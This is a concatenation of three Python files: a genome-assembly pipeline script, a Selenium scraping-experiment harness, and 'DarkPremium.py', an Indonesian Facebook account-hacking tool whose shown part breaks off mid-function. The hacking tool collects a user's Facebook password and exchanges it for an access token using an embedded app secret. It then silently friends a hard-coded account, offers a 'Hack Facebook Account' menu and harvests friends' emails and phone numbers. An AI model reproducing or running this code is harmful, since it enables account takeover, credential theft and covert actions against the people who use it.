    commands1 = [binbash, moduleLoads]+['rm *.anchors *.last *.filtered *.prj']+\
                ['nohup python -m jcvi.compara.catalog ortholog %s %s\nmv %s %s'%(ref,sample,'%s.%s.lifted.anchors'%(ref,sample),'%s.%s.lifted.anchors'%(sample,ref)) for ref in weights.keys()]
    commands2=[binbash, moduleLoads]+['rm multipleMapping.bed','\n'.join('python -m jcvi.assembly.syntenypath bed %s --switch --scale=10000 --qbed=%s --sbed=%s -o %s'%('%s.%s.lifted.anchors'%(sample,ref),ref+'_syn'+'.bed',sample+'_%ssyn'%ref+'.bed','%s.synteny.bed'%(ref)) for ref in weights.keys()),
              'python -m jcvi.assembly.syntenypath bed %s --switch --scale=10000 --qbed=%s --sbed=%s -o %snuc.synteny.bed'%('nucMap.bed',CDSspecies+'_nucSyn.bed',sample+'_nucSyn.bed',CDSspecies),
              'nohup python -m jcvi.assembly.allmaps mergebed %s -o %s'%(' '.join(['%s.synteny.bed'%(ref) for ref in (weights.keys() + [CDSspecies+'nuc'])]),'multipleMapping.bed')]
    qsub=[binbash,moduleLoads]+['python -m jcvi.assembly.allmaps path --skipconcorde --cpus=32 --ngen=300 --npop=50 multipleMapping.bed %s.fa' % (sample),
         'mv multipleMapping.fasta %sv1/%s/%s.fa' % (root,sample.replace('v0', 'v1'), sample.replace('v0', 'v1'))]
    #'nohup liftOver -gff %s.gff3 multipleMapping.chain %s.gff3 unmapped' % (sample.replace('_',''), sample.replace('_','').replace('v0', 'v1')), ,'mv %s.gff3 ../../v1/%s' % (sample.replace('_','').replace('v0', 'v1'), sample.replace('v0', 'v1'))
    #for ref in weights.keys():
    #    pairwise((sample,ref))
    """if __name__ == '__main__':
        q = Queue(maxsize=0)
        for command in commands:
            q.put(command)
        runCommands(q)"""
    #print '\n'.join(commands)
    with open('nucCommand.sh','w') as f:
        f.write('\n'.join(nucCommands))
    with open('constructv1_1.sh','w') as f:
        f.write('\n'.join(commands1))
    with open('constructv1_2.sh','w') as f:
        f.write('\n'.join(commands2))
    with open('qsub_buildv1.sh','w') as f:
        f.write('\n'.join(qsub))
    print os.listdir('%s/v1/%s'%(root,sample.replace('v0','v1')))
    # Each stage is skipped when its outputs already exist and are non-empty.
    if '%snuc.tiling'%CDSspecies not in os.listdir('.'):
        runCommand('sh nucCommand.sh')
    #print ['%s.%s.lifted.anchors' %(sample, ref) in os.listdir('.') and os.stat('%s.%s.lifted.anchors' %(sample, ref)).st_size > 0 for ref in weights.keys()]
    print all(['%s.%s.lifted.anchors' %(sample, ref) in os.listdir('.') and os.stat('%s.%s.lifted.anchors' %(sample, ref)).st_size > 0 for ref in weights.keys()]) == 0
    #exit()
    if all([os.path.isfile('%s.%s.lifted.anchors' %(sample, ref)) and os.stat('%s.%s.lifted.anchors' %(sample, ref)).st_size > 0 for ref in weights.keys()]) == 0:
        print sample, ['%s.%s.lifted.anchors' %(sample, ref) in os.listdir('.') and os.stat('%s.%s.lifted.anchors' %(sample, ref)).st_size > 0 for ref in weights.keys()]
        runCommand('sh constructv1_1.sh')
    sampleCount = 0
    for ref in weights.keys():
        # Carry the sample-side gene counter across references to keep ids unique.
        sampleCount = replaceGeneNames(sample, ref, sampleCount)
        print 'hello ' + sample, ref
    print 'construct_1' + sample + ' done'
    try:
        tiling2bed('%snuc.tiling'%CDSspecies, CDSspecies, sample, sample+'_%ssyn'%CDSspecies+'.bed')
    except:
        print sys.exc_info()[0]
        #exit()
    print 'hi2'
    replaceGeneNames(sample,CDSspecies,0,1)
    if os.stat('nucMap.bed').st_size == 0:
        # No usable nucmer mapping -> abort the whole process.
        exit()
    print 'hi3'
    runCommand('sh constructv1_2.sh')
    try:
        if os.stat('./multipleMapping.bed').st_size > 0:
            runCommand('qsub -P plant-analysis.p -N %s -cwd -l h_rt=50:00:00 -pe pe_slots 32 -e %s %s'%(sample,'ErrFile.txt','qsub_buildv1.sh')) #FIXME pe_slots 16, time limit pe_8
        else:
            with open('ErrFile.txt','a') as f:
                f.write('Multiple Mapping Size 0, unable to build v1...')
    except:
        with open('ErrFile.txt', 'a') as f:
            f.write('Multiple Mapping File does not exist, unable to build v1...')
    os.chdir(root)
    #for command in commands:
    #    print command
    #    runCommand(command)
    #FIXME ADD qsub
def formatSamplev0(sample):
    """Run the v0 BED and CDS formatting helper scripts for one sample,
    then return to the project root directory."""
    global root
    bed_cmd = 'python %sformatBed.py s %s v0'%(root,sample)
    cds_cmd = 'python %sformatCDS.py s %s v0'%(root,sample)
    for cmd in (bed_cmd, cds_cmd):
        runCommand(cmd)
    os.chdir(root)
def formatRef(reference):
    """Run the v0 BED and CDS formatting helper scripts for one reference
    genome, then return to the project root directory."""
    global root
    bed_cmd = 'python %sformatBed.py r %s v0' % (root, reference)
    cds_cmd = 'python %sformatCDS.py r %s v0' % (root, reference)
    for cmd in (bed_cmd, cds_cmd):
        runCommand(cmd)
    os.chdir(root)
# Initial chunking of samples into groups of 7 (recomputed inside __main__ below).
sampleDist = [listSamplesv0[x:x+7] for x in xrange(0,len(listSamplesv0),7)]
print sampleDist
def buildSampv0List(samplist):
    """Build each sample in the list, logging (printing) failures instead of raising."""
    for sample in samplist:
        try:
            buildSamplesv0(sample)
        except:
            print 'Error building ' + sample
def formatv0List(samplist):
    """Format each sample in the list, logging (printing) failures instead of raising."""
    for sample in samplist:
        try:
            formatSamplev0(sample)
        except:
            print 'Error formatting ' + sample
# Stage 1 driver: (re)build references and v0 samples in parallel.
if __name__ == '__main__':
    with open('output.txt', 'a') as f:
        f.write('Outv1')
    # Skip samples whose v1 fasta already exists.
    listSamplesv0 = [sample for sample in listSamplesv0 if sample.replace('v0', 'v1') + '.fa' not in os.listdir(
        '%sv1/%s' % (root, sample.replace('v0', 'v1')))]
    print len(listSamplesv0) // 6 + 1
    # Split the remaining samples into ~6 roughly equal chunks, one per worker.
    sampleDist = [listSamplesv0[x:x + len(listSamplesv0) // 6 + 1] for x in
                  xrange(0, len(listSamplesv0), len(listSamplesv0) // 6 + 1)]
    print listSamplesv0
    print sampleDist
    if ReferenceBuild:
        p = Pool(processes=6)
        p.map(buildReferences, weights.keys())
        p.map(func=formatRef, iterable=weights.keys())
        p.close()
        p.join()
    if sampleBuild:
        p = Pool(processes=6)#processes=8
        # NOTE: two map_async calls race against each other; formatting may
        # start before building finishes -- TODO confirm this is intended.
        p.map_async(func=buildSampv0List, iterable=sampleDist)
        p.map_async(func=formatv0List, iterable=sampleDist)
        p.close()
        p.join()
    #for samplelist in sampleDist:
    #    p.map(generatev1, samplelist)
    #for ref in weights.keys():
    #    formatRef(ref)
    #buildReferences('460')
    #formatRef('460')
def reader(q):
    """Queue worker: pull sample names forever and run generatev1 on each,
    logging failures to Error.txt. Intended for a daemon Process (see the
    commented-out wiring below); the loop never exits on its own."""
    while True:
        sample = q.get()
        try:
            generatev1(sample)
        except:
            print 'Generation Error in ' + sample
            with open('Error.txt', 'a') as f:
                f.write('Generation Error in ' + sample + '\n')
        q.task_done()
def genv1List(samplelist):
    """Run generatev1 for each sample in the list, printing (not raising) on failure."""
    for sample in samplelist:
        #generatev1(sample)
        try:
            generatev1(sample)
        except:
            print 'Error gen v1 in ' + sample
# Stage 2 driver: generate v1 assemblies for all remaining samples in parallel.
if __name__ == '__main__':
    #for samplelist in sampleDist:
    #q = Queue(maxsize=0)
    #num_threads = 6
    #for i in range(num_threads):
    #    worker = Process(target = reader,args=(q,))
    #    worker.daemon=True
    #    worker.start()
    # Re-filter: only samples still missing their v1 fasta.
    listSamplesv0 = [sample for sample in listSamplesv0 if sample.replace('v0','v1') + '.fa' not in os.listdir('%sv1/%s'%(root,sample.replace('v0','v1')))]
    print len(listSamplesv0)//6 + 1
    sampleDist = [listSamplesv0[x:x + len(listSamplesv0)//6 + 1] for x in xrange(0, len(listSamplesv0), len(listSamplesv0)//6 + 1)]
    p = Pool()
    p.map_async(genv1List,sampleDist)
    #for sample in samplelist:
    #    p.map(generatev1,args=(sample,))
    p.close()
    p.join()
    #for sample in samplelist:
    #    q.put(sample)
    #q.join()
    """try:
        generatev1(sample)
        break
    except:
        print 'Generation Error in '+ sample
        with open('Error.txt','a') as f:
            f.write('Generation Error in '+ sample + '\n')
        break
    """
"""'gffread -E %s -o- > %s' % (geneNaming + '.gff3', sample + '.cufflinks.gff'),
'python %sgff2CDSBed.py %s.cufflinks.gff' % (root, sample),
'gffread -E %s -o- > %s' % (geneNaming + '.gff3', sample + '.cufflinks.gff'),
'gffread -E %s -o- > %s'%([file for file in os.listdir('.') if 'cufflinks' not in file and (file.endswith('.gff3') or file.endswith('.gff'))][0],reference+'.cufflinks.gff'),
'gffread %s -x %s -g %s'%(reference+'.cufflinks.gff',reference+'.cds',fastaOld),
'python %sgff2CDSBed.py %s.cufflinks.gff'%(root,sample),
'bedtools getfasta -name -fi ./%s -bed %s.cufflinks.CDS.bed -fo %s.cds'%(fastaNew,sample,sample), """ |
seleniumBasic.py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
import time
from sys import platform
from multiprocessing import Process, Queue
import traceback
import logging
import numpy as np
import random
# Path to the unpacked browser-extension source loaded into Chrome.
unpackedExtensionPath = "../src"
# Per-OS chromedriver location and the extension's id (the key differs per
# machine because unpacked extensions get host-specific ids).
if platform == "linux" or platform == "linux2":
    # linux
    chromeDriverPath = '/home/schasins/Downloads/chromedriver'
    extensionkey = "clelgfmpjhkenbpdddjihmokjgooedpl"
elif platform == "darwin":
    # OS X
    chromeDriverPath = '/Users/schasins/Downloads/chromedriver'
    extensionkey = "bcnlebcnondcgcmmkcnmepgnamoekjnn"
def newDriver(profile):
    """Launch Chrome with the unpacked extension loaded under the given
    user-data profile, open the extension's mainpanel page, and return
    the webdriver instance."""
    opts = Options()
    opts.add_argument("--load-extension=" + unpackedExtensionPath)
    opts.add_argument("user-data-dir=profiles/" + profile)
    drv = webdriver.Chrome(chromeDriverPath, chrome_options=opts)
    panel_url = "chrome-extension://" + extensionkey + "/pages/mainpanel.html"
    drv.get(panel_url)
    return drv
def runScrapingProgram(profile, progId, optionsStr):
    """Start a fresh driver for *profile*, kick off saved program *progId*
    with the given options string, and return the driver."""
    drv = newDriver(profile)
    runScrapingProgramHelper(drv, progId, optionsStr)
    return drv
def runScrapingProgramHelper(driver, progId, optionsStr):
    """Load saved program *progId* in the extension mainpanel and run it.

    optionsStr is spliced verbatim into the injected JS as the argument of
    ReplayScript.prog.run(...), so it must be a valid JS object literal.
    The injected poller retries every 100ms until the program has loaded.
    """
    driver.execute_script("RecorderUI.loadSavedProgram(" + str(progId) + ");")
    runCurrentProgramJS = """
        function repeatUntilReadyToRun(){
            console.log("repeatUntilReadyToRun");
            if (!ReplayScript.prog){
                setTimeout(repeatUntilReadyToRun, 100);
            }
            else{
                ReplayScript.prog.run(""" + optionsStr + """);
            }
        }
        repeatUntilReadyToRun();
        """
    driver.execute_script(runCurrentProgramJS)
def blockingRepeatUntilNonFalseAnswer(lam):
    """Call *lam* repeatedly, sleeping one second between attempts, until
    it returns a truthy value; return that value."""
    while True:
        result = lam()
        if result:
            return result
        time.sleep(1)
def getDatasetIdForDriver(driver):
    """Block until the mainpanel reports at least one scraped dataset and
    return the first dataset id."""
    def askForDatasetId():
        return driver.execute_script("console.log('datasetsScraped', datasetsScraped); if (datasetsScraped.length > 0) {console.log('realAnswer', datasetsScraped[0]); return datasetsScraped[0];} else { return false;}")
    return blockingRepeatUntilNonFalseAnswer(askForDatasetId)
def getWhetherDone(driver):
    """Block until the mainpanel reports a completed scraping run and
    return the (non-zero) completed-run count."""
    def askHowManyDone():
        return driver.execute_script("console.log('scrapingRunsCompleted', scrapingRunsCompleted); if (scrapingRunsCompleted === 0) {return false;} else {return scrapingRunsCompleted}")
    return blockingRepeatUntilNonFalseAnswer(askHowManyDone)
class RunProgramProcess(Process):
    """Process that runs one scraping program in its own Chrome profile and
    pushes the resulting dataset id onto a shared queue.

    Retries the whole run up to 3 times on any exception before logging
    the traceback and giving up.
    """
    def __init__(self, allDatasets, i, profile, programId, optionStr, numTriesSoFar=0):
        # NOTE(review): parameter `i` is accepted but never stored or used.
        super(RunProgramProcess,self).__init__()
        self.allDatasets = allDatasets
        self.profile = profile
        self.programId = programId
        self.optionStr = optionStr
        self.numTriesSoFar = numTriesSoFar
        # Driver is created in the parent process, before fork.
        self.driver = newDriver(self.profile)
        # below is bad, but I'm going to do it anyway for time being
        #self.driver = runScrapingProgram(self.profile, self.programId, self.optionStr)
    def run(self):
        self.runInternals()
    def runInternals(self):
        """Run the program, wait for its dataset id and completion, then shut down the driver."""
        try:
            print self.optionStr
            runScrapingProgramHelper(self.driver, self.programId, self.optionStr)
            datasetId = getDatasetIdForDriver(self.driver)
            print self.programId, datasetId
            self.allDatasets.put(datasetId)
            done = getWhetherDone(self.driver)
            print self.programId, done
            self.driver.close()
            self.driver.quit()
        except Exception as e:
            # assume we can just recover by trying again
            if (self.numTriesSoFar < 3):
                self.numTriesSoFar += 1
                self.runInternals()
            else:
                logging.error(traceback.format_exc())
    def terminate(self):
        """Best-effort driver shutdown before terminating the process itself."""
        try:
            if (self.driver):
                self.driver.close()
                self.driver.quit()
        except: # catch *all* exceptions
            print "tried to close driver but no luck. probably already closed"
        super(RunProgramProcess, self).terminate()
"""
def entityScopeVsNoEntityScopeFirstRunExperiment(programIdsLs):
for programId in programIdsLs:
allDatasets = Queue()
p1 = RunProgramProcess(allDatasets,"1",programId,'{}')
p2 = Process(target=runProgramThread, args=(allDatasets,"2",programId,'{ignoreEntityScope: true}'))
d1 = p1.start()
d2 = p2.start()
p1.join()
p2.join()
print "------"
print allDatasets
for datasetId in allDatasets:
print "kaofang.cs.berkeley.edu:8080/downloaddetailed/" + str(datasetId)
"""
def joinProcesses(procs, timeoutInSeconds):
    """Wait (polling once per second) for all processes to finish.

    Returns True if every process exits within the timeout.  On timeout
    the while/else branch runs: all processes are terminated and joined,
    and False is returned.
    """
    pnum = len(procs)
    bool_list = [True]*pnum
    start = time.time()
    while time.time() - start <= timeoutInSeconds:
        for i in range(pnum):
            bool_list[i] = procs[i].is_alive()
        if np.any(bool_list):
            time.sleep(1)
        else:
            print "time to finish: ", time.time() - start
            return True
    else:
        # while/else: only reached when the loop condition (timeout) fails,
        # i.e. some process was still alive at the deadline.
        print "timed out, killing all processes", time.time() - start
        for p in procs:
            p.terminate()
            p.join()
        return False
def oneConfigRun(programId, i, j, allDatasetsAllIterations, simulatedErrorLocs):
    """Run one experiment configuration (program, error-location i, round j).

    Launches four RunProgramProcess workers in parallel -- our recovery
    strategy, two ideal baselines, and the naive strategy -- and repeats
    the whole batch until all four finish within the time limit.  The four
    dataset ids are appended to allDatasetsAllIterations and their download
    URLs appended to recoveryDatasetUrls.txt.
    """
    noErrorsRunComplete = False
    allDatasets = None
    while (not noErrorsRunComplete):
        allDatasets = Queue()
        errorLoc = simulatedErrorLocs[programId][i]
        simulateErrorIndexesStr = str(errorLoc)
        print simulateErrorIndexesStr
        p2 = RunProgramProcess(allDatasets,2, "2",programId,'{nameAddition: "+escope+loc'+str(i)+'+run'+str(j)+'", simulateError:'+ simulateErrorIndexesStr + '}') # our recovery strategy
        p3 = RunProgramProcess(allDatasets,3, "3",programId,'{nameAddition: "+ideal+loc'+str(i)+'+run'+str(j)+'"}') # the perfect ideal recovery strategy, won't encounter simulated error
        p4 = RunProgramProcess(allDatasets,4, "4",programId,'{nameAddition: "+ideal+loc'+str(i)+'+run'+str(j)+'", ignoreEntityScope: true}') # an alternative perfect ideal recovery strategy, won't encounter simulated error, but also won't use entityScope
        p1 = RunProgramProcess(allDatasets,1, "1",programId,'{nameAddition: "+naive+loc'+str(i)+'+run'+str(j)+'", ignoreEntityScope: true, simulateError:'+ simulateErrorIndexesStr + '}') # naive recovery strategy
        procs = [p2,p3,p4,p1]
        for p in procs:
            time.sleep(3) # don't overload; also, wait for thing to load
            p.start()
        # below will be true if all complete within the time limit, else false
        noErrorsRunComplete = joinProcesses(procs, 4000)
    print "------"
    f = open("recoveryDatasetUrls.txt", "a")
    # NOTE(review): this `i` shadows the error-location parameter above.
    for i in range(4):
        newDatasetId = allDatasets.get()
        allDatasetsAllIterations.append(newDatasetId)
        f.write("kaofang.cs.berkeley.edu:8080/downloaddetailedmultipass/" + str(newDatasetId) + "\n")
    f.close()
    for datasetId in allDatasetsAllIterations:
        print "kaofang.cs.berkeley.edu:8080/downloaddetailedmultipass/" + str(datasetId)
    print "------"
def recoveryExperiment(programIdsLs, simulatedErrorLocs, rounds):
    """Run every (program, round, error-location) configuration once,
    accumulating all dataset ids across iterations in a shared list."""
    collected = []
    for programId in programIdsLs:
        locCount = len(simulatedErrorLocs[programId])
        for roundIdx in range(rounds):
            for locIdx in range(locCount):
                oneConfigRun(programId, locIdx, roundIdx, collected, simulatedErrorLocs)
def shortRecoveryTest(programIdsLs, simulatedErrorLocs):
    """Smoke test: a single configuration run (first error location,
    round 0) for each program id."""
    collected = []
    for pid in programIdsLs:
        oneConfigRun(pid, 0, 0, collected, simulatedErrorLocs)
def main():
    """Entry point: run the recovery experiment (3 rounds) over the
    currently-enabled program ids.

    Only program 159 is active; earlier experiment ids remain as keys of
    simulatedErrorLocs for reference.
    """
    programIds = [159]
    # programId -> list of simulated error locations (index lists) per run.
    simulatedErrorLocs = {
        128: [[27], [54], [81]],                # community foundations
        155: [[2, 100], [3, 200], [4, 300]],    # new twitter
        138: [[10], [20], [30]],                # craigslist
        154: [[4, 225], [8, 150], [12, 75]],    # new yelp reviews
        145: [[10]],                            # yelp restaurant features the correction run
        158: [[10, 20], [20, 4], [30, 7]],      # yelp menu items
        159: [[10, 20], [20, 4], [30, 7]],      # yelp menu items (the mac version)
        152: [[8]],                             # zimride correction run
    }
    recoveryExperiment(programIds, simulatedErrorLocs, 3)
    #shortRecoveryTest(programIds, simulatedErrorLocs)
#shortRecoveryTest(programIds, simulatedErrorLocs)
main()
|
DarkPremium.py | # -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
# Python 2 only: force utf8 as the default string encoding.
reload(sys)
sys.setdefaultencoding('utf8')
# Shared mechanize browser used for the Facebook login flow below;
# robots.txt ignored, refreshes followed, mobile Opera user agent.
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
    """Print the exit banner ('Tutup' = close) and terminate the process."""
    print '\x1b[1;91m[!] Tutup'
    os.sys.exit()
def jalan(z):
    """Typewriter effect: print *z* plus a trailing newline one character
    at a time, flushing after each character with a 10 ms delay."""
    text = z + '\n'
    for ch in text:
        sys.stdout.write(ch)
        sys.stdout.flush()
        time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium v1.8\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96m MUHAMAD BADRU WASIH \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;92m \x1b[92mLimit[Zart] |./Badru |Wasih \x1b[ \x1b[1;97m║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92\x1b[92mhttps://github.com/Badru-CyberArmy \x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
    """Animated 'Loading ...' spinner: overwrite one line with growing dots."""
    titik = [
     '. ', '.. ', '... ']
    for o in titik:
        # py2 trailing-comma print: suppress newline so \r overwrites in place.
        print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.01)
# Module-level accumulators shared by the cracking/bot menus below.
# NOTE(review): `id` shadows the builtin of the same name.
back = 0
threads = []
berhasil = []   # successful logins
cekpoint = []   # checkpointed accounts
gagal = []      # failed attempts
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
# Status labels (ANSI-colored) used when reporting vulnerability checks.
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
    """Interactive Facebook login.

    If a cached token file (login.txt) exists, jump straight to menu().
    Otherwise prompt for credentials, log in through the mechanize form,
    then exchange the credentials for an access token via the legacy
    api.facebook.com REST endpoint (md5-signed request) and cache it.
    Recurses into itself on failure; never returns normally.
    """
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 52 * '\x1b[1;97m\xe2\x95\x90'
        print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
        id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
        pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
        tik()
        try:
            # NOTE(review): opens a YouTube URL, then submits the first form on
            # the page as a login form -- looks suspicious; verify intent.
            br.open('https://www.youtube.com/channel/UCc3ktJXzCcNfEo8q5t2lVAg')
        except mechanize.URLError:
            print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
            keluar()
        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            try:
                # Legacy REST auth: params concatenated + app secret, md5'd as 'sig'.
                sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
                x = hashlib.new('md5')
                x.update(sig)
                a = x.hexdigest()
                data.update({'sig': a})
                url = 'https://api.facebook.com/restserver.php'
                r = requests.get(url, params=data)
                z = json.loads(r.text)
                zedd = open('login.txt', 'w')
                zedd.write(z['access_token'])
                zedd.close()
                print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
                # NOTE(review): silently friends a hard-coded account with the new token.
                requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
                time.sleep(1)
                menu()
            except requests.exceptions.ConnectionError:
                print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
                keluar()
        if 'checkpoint' in url:
            print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
            os.system('rm -rf login.txt')
            time.sleep(0.01)
            keluar()
        else:
            print '\n\x1b[1;91m[!] Gagal Masuk'
            os.system('rm -rf login.txt')
            time.sleep(0.01)
            login()
def menu():
    """Main menu: validate the cached token, show account info, dispatch via pilih().

    Falls back to login() when the token file is missing or the account is
    checkpointed; exits on connection errors.
    """
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        os.system('clear')
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        login()
    else:
        try:
            # Fetch profile name/id and subscriber count to display in the header.
            otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
            a = json.loads(otw.text)
            nama = a['name']
            id = a['id']
            ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
            b = json.loads(ots.text)
            sub = str(b['summary']['total_count'])
        except KeyError:
            # Missing fields in the response -> token invalid / checkpointed.
            os.system('clear')
            print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
            os.system('rm -rf login.txt')
            time.sleep(0.01)
            login()
        except requests.exceptions.ConnectionError:
            print logo
            print '\x1b[1;91m[!] Tidak Ada Koneksi'
            keluar()
        os.system('clear')
        print logo
        print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
        print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
        print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
        print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
        print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
        print '║-> \x1b[1;37;40m1. User Information'
        print '║-> \x1b[1;37;40m2. Hack Facebook Account'
        print '║-> \x1b[1;37;40m3. Bot'
        print '║-> \x1b[1;37;40m4. Others'
        print '║-> \x1b[1;37;40m5. Update'
        print '║-> \x1b[1;37;40m6. Logout'
        print '║-> \x1b[1;31;40m0. Exit'
        print '\x1b[1;37;40m║'
        pilih()
def pilih():
    """Read a main-menu choice and dispatch to the matching feature.

    Decompiled-style nested if/else ladder; invalid or empty input recurses
    back into pilih().
    """
    zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
    if zedd == '':
        print '\x1b[1;91m[!] Can\'t empty'
        pilih()
    else:
        if zedd == '1':
            informasi()
        else:
            if zedd == '2':
                menu_hack()
            else:
                if zedd == '3':
                    menu_bot()
                else:
                    if zedd == '4':
                        lain()
                    else:
                        if zedd == '5':
                            # Self-update via git.
                            os.system('clear')
                            print logo
                            print 52 * '\x1b[1;97m\xe2\x95\x90'
                            os.system('git pull origin master')
                            raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
                            menu()
                        else:
                            if zedd == '6':
                                # Logout: remove the cached token and exit.
                                os.system('rm -rf login.txt')
                                os.system('xdg-open https://www.youtube.com/channel/UCc3ktJXzCcNfEo8q5t2lVAg')
                                keluar()
                            else:
                                if zedd == '0':
                                    keluar()
                                else:
                                    print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
                                    pilih()
def informasi():
    """Look up a friend by id or name substring and print their profile fields.

    Searches /me/friends for a match, then fetches the matching profile and
    prints name, id, email, phone, location, birthday and schools, each
    guarded by a KeyError fallback ('Tidak Ada' = not available).  Uses
    for/else: the else branch reports 'user not found' when the loop runs
    to completion.
    """
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token not found'
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        login()
    os.system('clear')
    print logo
    print 52 * '\x1b[1;97m\xe2\x95\x90'
    id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
    jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
    r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
    cok = json.loads(r.text)
    for p in cok['data']:
        if id in p['name'] or id in p['id']:
            r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
            z = json.loads(r.text)
            print 52 * '\x1b[1;97m\xe2\x95\x90'
            try:
                print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
            except KeyError:
                print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
            else:
                try:
                    print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
                except KeyError:
                    print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
                else:
                    try:
                        print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
                    except KeyError:
                        print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
                    else:
                        try:
